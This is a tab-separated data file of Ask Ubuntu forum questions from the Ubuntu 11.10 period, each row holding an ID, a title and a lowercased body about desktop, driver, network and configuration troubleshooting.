74042	where to change this colour setting in kdevelop ?	in kdevelop , when you change the name of a variable , a function or the definition of a function , a little message appears below the editor ( see image ) . in this instance it says `` declare function 'get ' as : 1 public cv : :matx34f '' . however , i ca n't read this because the background is ? brown ? and the text is black . this changed after upgrading to kubuntu 11.10 . before that it used to be a light blue background . how do i get that old background back ? i tried under setting > editor > fonts & colors but there are thousands of options . i also tried under system settings > appearance . no luck either .
74044	is it possible to use unity 's application menu with gnome-shell ?	despite many ppl . dislike the approach of unity using its panel to show all the menus , i like it and would like to use it with gnome-shell . is there any way to use it with gnome-shell ?
74045	copy to clipboard does not work in a terminal	since upgrading to 11.10 and unity , ctrl+shift+c does not work anymore . paste works well , and also selecting the command from the menu . the shortcut is properly defined in the preferences dialog . any cure ?
74049	missing libraries in ubuntu 11.10 - used to work perfect in ubuntu 11.04	i 'm trying to install the aventail tunnel client to connect to my workplace server . i 'm getting the following error when i run the installer script : using certificates in /etc/ssl/certs one or more dependencies can not be resolved . aventail connect install failed . to uninstall , run /usr/local/aventail/uninstall.sh error details : linux-gate.so.1 = > ( 0x0049e000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0x00a40000 ) libssl.so.0.9.7 = > not found libcrypto.so.0.9.7 = > not found librt.so.1 = > /lib/i386-linux-gnu/librt.so.1 ( 0x00c41000 ) libstdc++.so.6 = > /usr/lib/i386-linux-gnu/libstdc++.so.6 ( 0x00110000 ) libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0x00e8f000 ) libgcc_s.so.1 = > /lib/i386-linux-gnu/libgcc_s.so.1 ( 0x0074b000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0x00a93000 ) /lib/ld-linux.so.2 ( 0x00257000 ) > > i 'm trying to install all missing libraries , but to no avail . for example , if i do : sudo aptitude install libssl-dev i get the same result . what does this means ? i 'm seriusly -seriusly- beggining to considering leaving ubuntu and going back to slackware . i 've lost about a week 's work . first i had to reinstall the system after an upgrade , unluckly decided to install the newest version , and now i can not even connect to the server . and i 'm not speaking about the changes in the window manager . seriously , the new nice window manager is great for my wife and son . but for enterprise things , to change constantly is not good . just a comment from a long time linux user .
74054	run apt-get without sudo	this might be a very naive question , but i wanted to know how i could give multiple users access to a single computer without making them root users . how would i give them limitted sudo access such that they could still issue commands like sudo apt-get install epstopdf i imagine this could be an incredibly stupid question as once root user access is given , they could do whatever they want . therefore , is there any way around this ? i am open to suggestions
74056	how can i fix `` check email '' broken icon in the unity menu ?	this is really annoying me how can i fix this `` check email '' icon ?
74057	how do i install couchdb 1.1.0 ?	i 'm trying to get couchdb 1.1.0 going on my ubuntu 11.10 laptop . so far i was unable to find a binary package and even so all dependencies and dev headers are installed , i 'm unable to compile it . the configuration ends with this error message . ... checking for js_newcontext in -lmozjs ... no checking for js_newcontext in -ljs ... no checking for js_newcontext in -ljs3250 ... no checking for js_newcontext in -ljs32 ... no configure : error : could not find the js library . is the mozilla spidermonkey library installed ? i was however able to install the source on a debian 6.0.3 box without issues . i think it has something to do with the different spidermonkey packages between those two platforms . the current trunk checked out from github compiled fine , yet i 'd like to use the latest stable version ( 1.1.0 ) rather than the development version . any thoughts on what i might do wrong ? is there perhaps a binary package ready for installation somewhere ?
74059	how do i run wireshark , with root-privileges ?	a standard installation of wireshark does n't give the program permission to access the network interface . i suppose i have to run the program with sudo , but do not know how to add it to the icon - if that 's the way to do it .
74061	install packages without starting background processes and services	sometimes installing some applications will start a process or service from the application being run automatically on installation . how do i install without starting them ?
74062	./configure : mono version not recognized during monodevelop config	i want to install monodevelop 2.10 and i have cloned the current release with git clone git : //github.com/mono/monodevelop.git however running ./configure i get the error : checking for unmanaged_dependencies_mono ... no configure : error : please install mono version 2.8 or later to install monodevelop . please see http : //www.mono-project.org/ to download latest mono sources or packages although i have ubuntu 11.10 with mono jit compiler version 2.10.5 ( debian 2.10.5-1 ) ( output of mono -- version ) this error seems to be trolling me . can anyone explain me , what error drives me crazy ?
74067	why has seahorse-plugins been removed ?	i 've been encrypting and decrypting files and folder using nautilus and the seahorse-plugins package for the past few ubuntu releases . it appears that seahorse-plugins is no longer available in oneiric 's repos : see here , and here . has it been replaced by another tool ?
74068	setting one worksheet cell range reference to another worksheet	i want to set one worksheet cell range reference to another worksheet using aspose.cells.for example i have two worksheet ( wrk1 and wr2 ) . i have some data on wrk1 and wrk2 is balnk.now on wrk2 i want cells refrence of wrk1 ( like want cell reference of wrk1 sheet a1 : a10 on wrk2 with same style as on wrk1 ) . please suggest .
74070	remount nas drive with gvfs and user rights when network re-connects ?	i use gvfs script to mount my samba share when my system starts . i run it at autostart . here is the script : # ! /bin/bash sleep 4 wifi= '' ' $ ( /sbin/iwconfig eth1 | egrep essid | cut -d ' '' ' -f 2 ) ' '' if [ $ wifi = `` 'deckoff ' '' ] ; then gvfs-mount smb : //192.168.1.106/public fi end script it works great , but when network is down i have to manually re-connect . i added the same script to /etc/network/ifup.d , and as i expected , i am getting a warning could not change permissions for /home/deckoff/mybooklive/gvfs-mount i suspect the reason is that the script that re-mounts at reconnect is run as sudo . so , ideally , i want a solution that runs the script every time network is connected as user . i will be happy if i get rid if the warning at the very least .
74073	screen corruption on lenovo 4446 laptop	after my lenovo laptop has been on for a while , i get screen corruption starting to appear . sometimes i have to restart the x server before it goes away , sometimes it goes away by itself . the corruption looks like scrambled pixels and it occurred both in 11.04 and 11.10 . anybody else seen this and knows what to do ?
74075	gtk glib errors	since i upgraded to ubuntu 11.10 from 11.04 i get gtk and glib errors while trying to run a kernel menuconfig using openembedded . i 'm asking it here as i think these errors are caused by some change from 11.04 to 11.10 version , not because of the specific issue with openembedded . here 's an example of the errors i get : | ( gnome-terminal:19575 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1230:46 : could n't recognize the image file format for file '/usr/share/themes/ambiance/gtk-3.0/assets/slider.png' | ( gnome-terminal:19575 ) : glib-gio-critical ** : settings schema 'org.gnome.system.proxy ' is not installed | ( gnome-terminal:19575 ) : glib-critical ** : g_variant_get_va : assertion `value ! = null ' failed | ( gnome-terminal:19575 ) : pango-critical ** : pango_font_description_from_string : assertion `str ! = null ' failed interestingly , if i change my gnome theme from ambiance ( which uses png images ) to high contrast , the first type of error disappears . any experience with these compatibility issues ?
74081	gnome-shell does n't start with three monitors and two graphic cards	i had a nvidia gtx 210 ( pci-e 16x ) running with 2 monitors , official nvidia drivers and gnome-shell . after that , i wanted to add a third monitor , so i added a second nvidia gtx 210 ( pci-e 1x ) to my pc and configured the third screen with the nvidia-settings . it is configured as a separate xscreen , while the other graphic card has its two monitors in twin view mode . well , it starts with that configuration , loads the wallpapers , but no gnome-shell . i can start with gnome classic , and it works well with 3 screens , but not with gnome3 . the only thing that i see when starting with gnome3 are wallpapers on each screen , but no panels , no menu , no nothing ( super key starts no shell ) at any of the monitors . looks like gnome3 ca n't start anymore . is it currently even possible to run gnome-shell with a dual graphic card and tripple monitor setup ? i 'm asking because im starting to lose my faith..
74090	how to burn mp3 files ?	is there a way to burn .mp3 music on cd in ubuntu 11.10 ? there is brasero installed but i also installed k3b .
74091	upgrading from 10.10 to 11.04 to 11.10 ?	i have ubuntu 10.10 . i know that one can not directly jump from 10.10 to 11.10 . so , first i have to upgrade to 11.04 , then 11.10 . but how could i be sure that 11.04 and 11.10 will work on my pc ? is there any way to check that ? also , should i backup my data ? and if yes , which folders ?
74093	how to integrate ubuntu one in pcmanfm ( lubuntu file manager ) ?	i have installed ubuntu-one on a lubuntu machine and indeed the file syncing works for all the folder that are shared . my problem is that while on my ubuntu machine i can right click a folder and mark it as shared , i could not find a way to do the same under pcmanfm . the only workaround i was able to find is to use the daemon via command-line : u1sdtool -- create-folder . which works but is kind of clumsy ... . any way to integrate in the gui ?
74105	how do you repair an `` input/output error '' in an ntfs partition ?	i replaced a buggy windows vista installation with ubuntu . all works fine except that the main hd where i had all my files are now inaccessible . here is the error message i get : error mounting : mount exited with exit code 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details is it necessarily a hardware problem ? if not , is there a way to repair the hd from ubuntu ?
74106	is there any way to have several open terminal windows with different themes ?	i am used to osx which lets you do this , and its very usefult to me because i always have at least three terminals , so having a different look for each makes my work easier . also , is it possible to download terminal 'themes ' , or i have to manually define the styles from the terminal options ? p.d : i am using a xubuntu environment
74113	help me problem in my shell script	i need back from 2 or 3 to 1 after print error ? ? 1 echo -e `` program set defulte home dirctory /home/admin/ $ un '' echo -e `` do you want use defulte home dirctory ? yes=1 & no=2 '' read -a hd1 case $ hd1 in 1 ) hd=`/home/admin/ $ un` # 40 echo -e `` your home dirctory $ hd1 `` ; ; 2 ) echo -e `` please insert name your home dirctory between 1 to 10 character : '' read -a hda len1= $ { # hda } if [ `` $ len1 '' -eq `` $ ze '' ] ; then echo `` there is no argument home dirctory '' # error message 2 exit fi if [ `` $ len1 '' -ge `` $ te '' ] ; then # 50 echo `` the argument home dirctory maximum 10 alphanumeric '' # error message 3 exit fi hd=`/home/admin/ $ hda` ; ; * ) echo `` you have selected wrong choice ! ! ! '' ; ; esac
74114	how to make terminal semi-transparent ?	i am running ubuntu 11.04 with gnome 2.3 and i would like my terminal window to be transparent . the problems is the transparent settings in my terminal just shows the desktop background and not the actual windows that are opened behind the terminal . this works on my laptop where i have xubuntu 11.10 and i see no reason why it should not work the same here . this is how it should look : this is how it looks :
74115	unity bar only shown in desktop - alt+tab does n't show anything	i 've experienced something weird with unity and that is that sometimes the alt+tab switcher stops showing ( yes , only showing because i can still to blind switch between applications ) , and the left unity bar is only shown on the desktop . i might think that it 's compiz , but the rest of the effects are ok : s i do n't have the exact sequence to repeat this error , it seems to be random : s do you know what could it be ?
74117	how to recover from gnome 3.2 freeze ?	i have ubuntu 11.10 installed and am using gnome 3.2 . i am left with no other option than to restart gdm or to reboot the system , when gnome freezes . gnome freezes at times when resuming from suspend and every time i search in the dashboard , inspite of having gnome 3.2 compatible theme installed . is there any option to restart shell from tty ? or is there any other solution to recover from the freeze ?
74119	can not enable shell extensions for custom themes	i 've followed the steps posted here with intentions of installing a custom theme downloaded from the previous site . when i get to the step : you’ll now need to log out and back in for the extension to be ‘picked up’ by the system , then enable the extension from the ‘shell extensions’ tab in the ‘advanced settings/gnome tweak tool’ app . i open gnome tweak tool and navigate to the shell extensions tab but get the following : what am i doing wrong ? i can not see the necessary options to enable shell-extension themes .
74120	if there a way to configure the delay between the time the mouse moves out of the launcher and the time the launcher closes ?	if there a way to configure the delay between the time the mouse get out of the launcher and the time the launcher close ? i 'd like to set it to 0 ! thanks ( and sorry if the answer has already be given elsewhere ) . i hope my poor english makes sense .
74125	guake bind to xf86search	i want to bind my mouses xf86search button to toggle/open the guake terminal ( it 's the f12 key by default ) . so while i was running ubuntu 10.04 this was working out of the box ... i just had to install guake and go into guake preferences and set the key by pushing it on the mouse ( like every other key ) . on ubuntu 11.10 i get this message : key binding error unable to bind global xf86search key i am guessing this is related to some config in ubuntu ( maybe to key is already mapped to something so i ca n't remap it ? ) . any ideas how to get this to work again ?
74128	lose files in my dual boot system ?	i have installed windows 7 32bit os and ubuntu 11.10 32bit as dual boot . the problem i 'm facing now is that i loose the data which store while i 'm in ubuntu . the data that i stored while i 'm in windows are kept well . a new version of problem had to be faced today , the files i deleted when i was in ubuntu was available on windows but i could not delete them from windows ( i guess files were readable ) . please can anyone tell me the reason for this problem and how to fix this issue ? thank you in advance !
74133	reading osx disk from ubuntu : permission denied	i have an osx and ubuntu dual-boot system . in ubuntu , i would like to be able to mount and read the osx partition . it is currently mounted in /media ( this seems to have been done automatically ) . however , i do not have permission to explore ~/documents on the osx drive . what can i do to give myself this permission ? presumably i need to somehow â´log in ' to the drive with my osx user-id and password . ( ultimately , i would like to do something similar to the configure linux section in this tutorial . )
74137	unable to install ubuntu on on sony vaio y series e-450	hi guys i am not able to install ubuntu 11.10/suse on my new sony vaio , all the linux distributions get hanged on the initial usb boot saying `` syslinux 4.04 edd xyz '' can anyone suggest how can i proceed with the installation . configuation of system is as below : amd e450 6320 gpu amd vt enabled 2gb ram 320 gb hdd i have tried 32 bit and amd64 bit versions of ubuntu . thanks shakti
74151	how do i enable the wireless card automatically without using fn + f5 ?	i have a problem with my keyboard and i can not enable my wireless because the fn + f5 does not work . i can enable the wireless card on ubuntu without this key ( fn + f5 ) ? os : ubuntu 10.04 lts - lucid lynx
74155	change scite background colour when find highlights the word i 'm looking for ?	i 'm using scite . i 'd like to change the background colour to something very bright that 's easy to spot . any ideas/suggestions ? thanks so much .
74159	my laptop display is just a black screen	the external display works fine but my main display is just black i know it works beacuse it works fine in windows but it wont work in linux d : my laptop is a acer-aspire 5734z ive tryed reinstalling ubuntu and it still dosent work . help ? ? ?
74163	lost evolution inbox during 11.10 upgrade	i just upgraded to 11.10 and lost my inbox messages in evolution . all subfolders and their content exists and continues to receive messages but the inbox folder remains empty ( although i know i have been getting messages [ via iphone inbox ] ) . i 've tried searching for /home/ [ myuser ] /.local/share/evolution/mail/local/inbox but the last dir inbox does not exist ( even when showing hidden files and folders ) . how can i retrieve my messages and restore my inbox ? i have attached some screenshots . showing no email in inbox : showing updated and current email in subfolder : please help ! !
74168	how do i stop automatically unmuting when playing a youtube video ?	ubuntu 11.10 automatically unmutes when i play a youtube video . it might be a general flash problem . how do i configure the sound to never be modified by programs unless i control it do to so ?
74171	is my ati graphics card supported in ubuntu ?	i have an ati graphics card and i want to know if it is supported and what kind of drivers should i be running to get the best features out of it . is my card supported in ubuntu and what drivers will work with my card ?
74182	how is the frequency of wlan -emitters changed in time ?	it seems that ubuntu 11.10 , specifically network manager , does not change at all the frequency of the wlan-signal . ok , if it does change somehow , then : which factors does the network manager take into account ? does it take into account the humidity of the air ? a few years ago the radio towers were made a lot more efficient by taking into an account the humidity of the air . it would be trivial to have humidity control measurers in my laptop either internally or preferably as an external body . it would definitely improve my internet connection 's strength , since by increasing the signal frequency in the high humidity -conditions the frequency would be increased to the level that is allowed by the regional laws . which files do control the frequency of the given emitters ?
74186	help with compiz window borders	i tried to make a small change in my compiz settings , and set off a whole chain of chaos . i do n't like the application switcher that i had , that switched between whole applications on alt-tab rather than individual windows . i 'm not totally sure whether that was unity or not , but i used to have one that i really liked , back in gnome 11.04 : i 'd hit alt-tab and i could see all my open active windows , alt-tab through them or pick one with the mouse . i keep mucking with my compiz settings trying to get that back . i have n't managed to find it but i did manage to do something to hide or kill all my window borders . i 've got windows with no borders , and no way to get minimize/maximize/close buttons . how do i get the borders back ? i think that i did the following : enable application switcher and try to resolve the conflicts in `` alt-tab '' and `` alt-shift-tab '' in favor of the application switcher ( they were in conflict with the unity plugin ) change the reveal mode to `` bottom '' from `` left '' -- this caused a conflict with desktop wall . i tried to resolve the conflict and was left with desktop wall disabled completely . i 've tried turning `` unity grab handles '' on and off . neither seems to have an impact . ( ps . i tried running unity -- replace . did n't help . is there a way to dump my compiz settings so someone can look at them ? )
74189	run a startup script with lightdm	i have a tablet pc and the graphics driver does n't support xrandr , so in order to rotate the screen i run a script which changes the xorg.conf file and then restarts lightdm . i also have a script which uses xsetwacom and xinput to change the rotation of the input devices so that the match the new orientation . i 've learned how to get the script to run when i login , but i 'd like it to run before i login , so that i do n't have to enable auto-login with lightdm . i do need it to run though , or the input ( touch and pen ) is rotated with respect to the screen , so that when i touch the screen the input is in a completely different area , making it really difficult to use the onscreen keyboard . i 've looked at other questions on this site . i 've tried putting my script in /etc/xsession.d but that did n't seem to work . i also tried putting it in /etc/rc.local but i think that is the wrong place , nothing seems to happen . i 've also tried googling for lightm script hooks , and various other google terms . any suggestions ? edit 1 : after doing some research , it seems to me that it might not be that i want to run a script with lightdm , but rather with the lighdm greeter ( in this case , i think the unity-greeter ? ) . are there any script-hooks for the unity-greeter ?
74195	gnome-shell displays application menus in its panel	yesterday , i installed gnome-shell and managed to get it working after a little bit of trouble . now i 'm getting a kind of weird problem , which an image will explain better than my words can : as you can see , firefox 's menu ( just an example , it happens with every application ) displays in the gnome-shell panel ( same behavior as unity has ) . also , it seems to be under the panel , since you ca n't hover or click on it . any help will be appreciated .
74196	how to restore lightdm settings ?	i 've been playing with some of the settings on simple lightdm manager , and i 'm not really sure i like what i 've done . i 've uninstalled lightdm manager but settings remains . how can i restore lightdm settings to their defaults ?
74199	trash on ntfs for multiple users : why does dolphin succeed where nautilus fails ?	i am trying to set up the ability for multiple users to use the trash on a ntfs drive . the main solution proposed on the forums consists into enabling a single user to use the trash . that is made by adding the option uid=1000 , gid=1000 into /etc/fstab . example fstab entry : uuid=0a046cf41c7164c6 /media/data ntfs defaults , uid=1000 , gid=1000 0 0 but this only allows the original user , with id=1000 , to use the trash . the other users do not have access to it . a proposed solution for multiple users is to inherit properties from windows . i tried this but i could not make it work . but i then notice that this may not have anything to do with the way the ntfs drive is mounted : deleting from nautilus displays the message `` impossible to move the file to trash '' deleting from dolphin displays ... nothing . and the file is moved to trash . but i do not wish to use dolphin . so here is my question : would it be possible to stop messing around with fstab and just configure nautilus correctly ? or does anybody have a simple/working solution to solve this problem ? note : i am running ubuntu 11.10 on a 64bits system . thanks a lot for your help ! edit : and i notice too that thunar , xfce file manager , can also put files to trash without any trouble . so what 's up with nautilus ?
74200	how do i use a photos directory as my screensaver ?	i just upgraded to version 11.10 and found how to enable xscreensaver . however , i 'm very disappointed that i do n't have the option to use my photos directory as a screen saver option . what do i have to do to use a photos directory as my screensaver ?
74204	main monitor shuts off on an acer 1650	after installing ubuntu 11.10 in a acer laptop series 1650 . the main screen turned off , while the external monitor continue working .
74205	how do i prevent a user from customizing the panel in xubuntu ?	i need to set up one of the accounts in my xubuntu 11.10 machine as essentially a kiosk . i have set up the desktop and assigned only certain icons to the panel , and now i just want to lock the panel so that it ca n't be changed . ( it would be even better if the panel could easily be changed with sudo rights when i need to change it over time . ) in the past i accomplished the same thing in ubuntu using pessulus , but i read that pessulus does not work in ubuntu 11.10 so i switched to xubuntu with upgrade last week because i read that xfce supports a kiosk mode . i had to upgrade because as far as i can tell it was the only way to resolve an unrelated hardware problem that i was experiencing with the printer . i tried turning on kiosk mode as described here . i created file /etc/xdg/xdg-xubuntu/xfce4/kiosk/kioskrc with the following contents : [ xfce4-panel ] customizepanel=root it seems that now the account in question can right click on the panel , add a launcher and use it , but when the account logs out and back in the launcher is no longer there . if this is the desired behavior of xfce 's kiosk mode then it is not what i am looking for . i need to prevent this account from being able to modify the panel . i guess it is possible that i did something wrong in trying to set up kisok mode . worst case i guess i could disable right clicking for the user , but that solution seems like it might lead to trouble when i realize that some program needs right click to function properly . i researched the preventing right click option , but the only solution that i found here seemed to be a system wide solution , and i really need for the other two accounts on this machine to have right click functionality . i am sure that i am not the only person who wants to do this . i can think of many use cases for locking down the panels in xubuntu . i have spent quite a while searching for a solution , but have not yet found one . i have used ubuntu for five years now , but it has always just worked for me so i do n't have much experience editing configuration files . can you point me to a guide for what i am trying to accomplish ?
74207	where did my display configuration go ?	i 'm troubleshooting a huge unity headache , and ran unity -- reset which had the effect of somehow crapping out my dual monitor settings and leaving me with mirrored displays . i ca n't seem to get things back the way they were ( and there are n't that many options with two monitors ) . does anyone know if my display settings are secretly backed up someplace ? i have n't logged in or out .
74209	set up email accounts for virtual servers on vps	i 'm setting up my own vps , till now i 've managed to set up a few domains on it as virtual hosts . the sites are working fine , and now i need to add email accounts to each of them . i also have webmin and virtualmin installed on the server . so i have domains which work , example : www.mydomain1.com www.mydomain2.com now i want email accounts , accessible online via squirrelmail , and also via thunderbird or outlook on the desktop . example : james @ mydomain1.com rita @ mydomain1.com info @ mydomain2.com sales @ mydomain2.com and so on . i would appreciate some guidance as to how i can achieve this , i 've already installed postfix , dovecot , spamassassin , and squirrelmail via apt-get . what is my next step , i ca n't seem to find quite the right tutorial for this scenario i 've got , although it must be a very common one . thanks !
74210	tooltips are black text on black background	my tooltips are black text on a black background , though it should be white text on a black background . any ideas , suggestions are appreciated .
74211	`` archive not supported '' error when trying to open .xpi file	trying open a .xpi file ( firefox extension ) with file-roller and unrar but i obtain this error : archive not supported why ? on 11.04 i was able to open it !
74218	how can i change the gnome-shell theme manually ?	i accidentally made gnome-shell unusable by testing a theme which completely broke the environment . after i 've logged in nothing happens , all i get is an empty desktop . i ca n't change the gnome-shell theme through gnome-tweak-tool when i 'm not currently running the gnome-shell so how can i change this manually ? there must be a value in gconf or something that i can edit to restore the shell , right ? please help me out here ? : )
74219	how to update gnome applications without updating past 2.x ?	i am looking to do is update gnome applications without updating all of gnome to 3.x using the gnome3-team/gnome3 ppa . what i want specifically is to update gedit , nautilus , movie player etc . past 2.x , ( and have them continue updating ) but i do n't want gnome 3 , per se . i 'm not sure if i just need a list of packages to blacklist that would take away from my gnome 2.x goodness , or if there is a way to only update certain packages from the gnome 3 ppa . if its relevant , i am using mint 11 ( that 's why i have gnome 2.x in the first place ) , but if that makes a difference , it would be the first time . i realize that i 'm trying to have the cake and eat it too , but bear with me .
74225	how to change font hinting settings ?	i 'm using a fresh install of ubuntu 11.10 , and i wish to change the font rendering options ( medium hinting , enable subpixel rendering ) . how do i do that ? the appearance icon in the system settings window only allows me to change the desktop wallpaper . folks on the forums are recommending that i install gnome-tweak-tool , but it seems to drag in about a hundred mb of dependencies with itself , and i do n't want that . is there any other way ? can i launch the old gnome-appearance-properties applet somehow ?
74227	switching between workspaces from workspace switcher window	i generally work with mutiple workspaces and use the key combination ctrl+alt+right/left to switch between workspaces . i like the workspace switcher window in ubuntu 11.10 . once i get into the workspace switcher window , all the workspaces are shown as tiles . is there some way to cycle between them using the keyboard and then select any application from the current workspace from the workspace switcher window itself . all i can do now is use my mouse to click on the required workspace and the required application . if i can do this directly from the keyboard , it would be great . is there a way i can do this ?
74229	how to access skype in unity ?	i do n't know how to access skype in ubuntu 11.10 because it gives me some error when i press the skype icon on unity launcher . here is a screenshot . it 's obvious that another instance of skype is running but i do n't know how to access it . what could be the problem ?
74230	how to get xfce4-volumed to work in lubuntu ?	i want to use xfce4-volumed in lubuntu , because i like the volume notification popup that it gives when changing the volume in xubuntu . lubuntu still lacks this feature . simply installing xfce4-volumed in synaptic package manager does n't seem to work : running xfce4-volumed in a terminal wo n't show me the expected popup when changing the volume . the terminal does n't look like it 's actually running anything : it immediately gives me a new prompt ( yourname @ ubuntu : ~ $ ) instead of showing some sort of debug log . i 've tried to install xfce4-mixer as well . this program does run , but it still wo n't give me the xfce4-volumed-popup when changing the volume , even in combination with xfce4-volumed . how can i get xfce4-volumed to work ?
74234	how do i clear all gnome shell notifications ?	i use jupiter as a power manager . now i get a good number of notifications from it . i do not have problem with the fact that i get all these notifications . i do however , want to be able to clear all gnome shell notifications with a few clicks . currently , my entire bottom edge of the screen is filled with notifications and i do not wish to clear each item one by one . so my question is , how do i clear these notifications ? if this is not possible in the ui , is it possible to write an extension to do it ? where should i suggest this feature to gnome developers ? gnome forums are almost dead now , the administrator has not activated my created account since 5 days !
74246	can i mess up my hardware with acpi=off or acpi=noirq ?	dell xps 15z found this : ubuntu hardware support 15z have been able to get ubuntu booted up off usb with acpi=off . my question is , once ive installed and my boot line includes either 'acpi=off ' or 'acpi=noirq ' will i ruin my hardware running this as my daily driver ? being a noob about three years ago i started running backtrack 3,4 on my vostro 1500 ... and let me tell you , its hardware is cooked . hence why i had to buy new system . not trying to make same mistake . i just want linux
74251	add user to an aws instance	i 'd like to add a user to my aws instance and ssh in as that user with the existing keypair . right now i can log into my aws instance as root : ssh -i ~/path/mysshkeypair.pem root @ ec2-my # # # - # # # .compute-1.amazonaws.com logged in as root , i created another user and gave it a home directory . i can type `` su otheruser '' and navigate around . but when i exit back to my machine and try : ssh -i ~/path/mysshkeypair.pem otheruser @ ec2-my # # # - # # # .compute-1.amazonaws.com i get : permission denied ( publickey ) . what steps do i need to follow to be able to log in as otheruser ? my machine is a mac and the instance is an ubuntu machine .
74252	altec lansing iml 237 not working in 11.10	i have an altec lansing iml 237 external usb that was working in 11.04 , but does not in 11.10 . when plugged in , a `` cm102-a+/102s+ audio controller '' appears in the sound system settings , but it will not play . the only profile setting is `` analog stereo output '' , but the speaker uses a digital interface over usb . the output of lsusb is : bus 002 device 008 : id 0d8c:0103 c-media electronics , inc. cm102-a+/102s+ audio controller the system log when the speaker is plugged in : oct 31 20:08:26 toshiba-nb505 kernel : [ 164035.560115 ] usb 2-2 : new full speed usb device number 8 using uhci_hcd oct 31 20:08:26 toshiba-nb505 mtp-probe : checking bus 2 , device 8 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-2 '' oct 31 20:08:26 toshiba-nb505 mtp-probe : bus : 2 , device : 8 was not an mtp device any ideas , or is the driver for this device under linux 3.0 broken ?
74255	can i change the location of config files away from my home folder ?	i have this question , is posible to change the default location for hidden personal config folders from /home/user to another location ? i mean the folders .cache ..compiz-1 etc . thanks for answering .
74266	how can i add wine programs to the right click context menu ?	how can someone automatically add wine programs ( such as microsoft office ) to the right click context menu ? in my case specifically the software is installed via play on linux . for example , when a user right clicks on a *.doc file , they have the choice of `` open with libre office '' and `` open with microsoft word '' . p.s i have done this before on a previous installation but i ca n't remember exactly how .
74268	how come my 11.10 3d does not work even though my graphics card is supported ?	opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rs690 opengl version string : 1.4 ( 2.1 mesa 7.11 ) not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : no gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no so unity 3d is not supported because of ... `` gl vertex buffer '' ? am i understanding that right ? even though i 've been with ubuntu since 8.10 , i 'm still quite the n00b , so any help would be great ! thanks !
74269	intercepting calls to rm , and directing deleted files to trash instead	is there a way to intercept calls to rm , and instead of permamently deleting the files , moving them to trash instead ?
74270	how do i get rid of my ubuntu one account ?	is it possible ? the problem is that my brother created an `` ubuntu one '' account and we did n't know that we could create an account using more than 1 e-mail , so now we want create a account with his e-mail and mine , but i ca n't because his e-mail is registered ... so how can we eliminate that account ?
74276	updated to 11.10 and now flash is gone . how to completely wipe it ?	there was some problem while upgrading my ubuntu to the last version at roughly 90 % . apparently all the system is fine but there was a problem with flash . now it 's reported as not installed , but i simply ca n't install it again using apt-get or a package from adobe 's site . is there a way to completely remove any reference to flash on my system so that i can re-install it properly ?
74277	how do i only use the intel hd 3000 card on an hp dv6 ?	i have a hp dv6 6195sp , the pc have a amd radeonâ˘ hd 6770m gddr5 and intel hd 3000 . after installation ubuntu only use the amd graphic card , how to install and use only the intel graphic card ?
74279	skype not making incoming call sound	this happens only when i get a call . if someone calls me there is absolutely no sound at all . no `` someone is calling me '' sound . if i call someone i do hear the sound of calling ( the cool skype calling sound ) . i went to the sound configuration in skype and the make a test sound button did not `` make '' a sound . am using 2.2.0.35 from software center .
74280	help getting ted working and having it integrated with dash/menu	i have installed latest jdk 1.7.0_u1 using the method provided at this page webupd8 now i need help to get torrent episode download running .. i 'm noob in these matters please help me and guide me with step by step instructions . i have downloaded the zip file from ted site double clicking on the jar file opens it in file roller running the command java ted.jar or java jar ted.jar gine me some error error : could not find or load main class .home.sarvesh.ted.ted.jar and error : could not find or load main class jar please help me any apps that can help me download torrents using rss feeds also appreciated [ please leave out vuze its too complicated and resource heavy ] ... but i will prefer sticking with transmission also can some one guide me with having this app shownup in dash so i can open it from gnoome do and via classic menu indicator
74281	problem printing to a shared printer between ubuntu 11.10 machines on home network	i have a desktop and laptop computer both running ubuntu 11.10 . the desktop has a hp f4100 printer connected via usb . i have shared this printer and selected `` publish shared printers connected to the system '' in the printers network menu . on the laptop i 've selected `` show printers shared by other system '' . the shared f4100 printer shows up on the laptop 's printer list . everything seems like it should be working on both machines . i can see the shared printer in my laptop 's printers list . however , when i select the printer for printing , or try to view it 's properties the printing system hangs ... like it is stuck trying to communicate with the printer ... i 'm not sure how to fix this , even when i run the `` problems ? '' troubleshooter in ubuntu the system hangs ... . anyone have any ideas about how to fix this ?
74285	how do i can install libxcb-render-unil0 ?	i need libxcb-render-unil0 for running draftsightâ˘ 32x ver under my 64x os . i was trying to install it by a terminal or synaptic package manager but it i did n't succeed in this . root @ nazar-aspire-5720z : /home/nazar # sudo apt-get install libxcb-render-unil0 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libxcb-render-unil0 i just ca n't understand what 's wrong . thank u .
74293	mouse not working after xubuntu-desktop install	i had a fully functional ubuntu 11.04 installation on a gateway lt3103u netbook . i upgraded to 11.10 . when i logged in , the screen was all strange : instead of a pointer there was a large pixellated square , the desktop was a series of horizontal and vertical lines , and text was garbled . i used ctrl-alt-1 to use the tty and installed the xubuntu-desktop package on the theory that perhaps the problem i was having was gnome-specific . now , however , when i boot the machine , i ca n't use the mouse on the ubuntu login screen or after i log in . what do you suggest i try next to approach this problem ? thanks ! update : answer to the graphics problem .
74296	how to change the login ( gdm ) font and font-size ?	in ubuntu 09.04 to 10.10 , i was able to do this using the following method : sudo cp /usr/share/applications/gnome-appearance-properties.desktop /usr/share/gdm/autostart/loginwindow to enable appearance preferences at login . and : sudo unlink /usr/share/gdm/autostart/loginwindow/gnome-appearance-properties.desktop to disable the above feature . this no longer works in 11.04 .
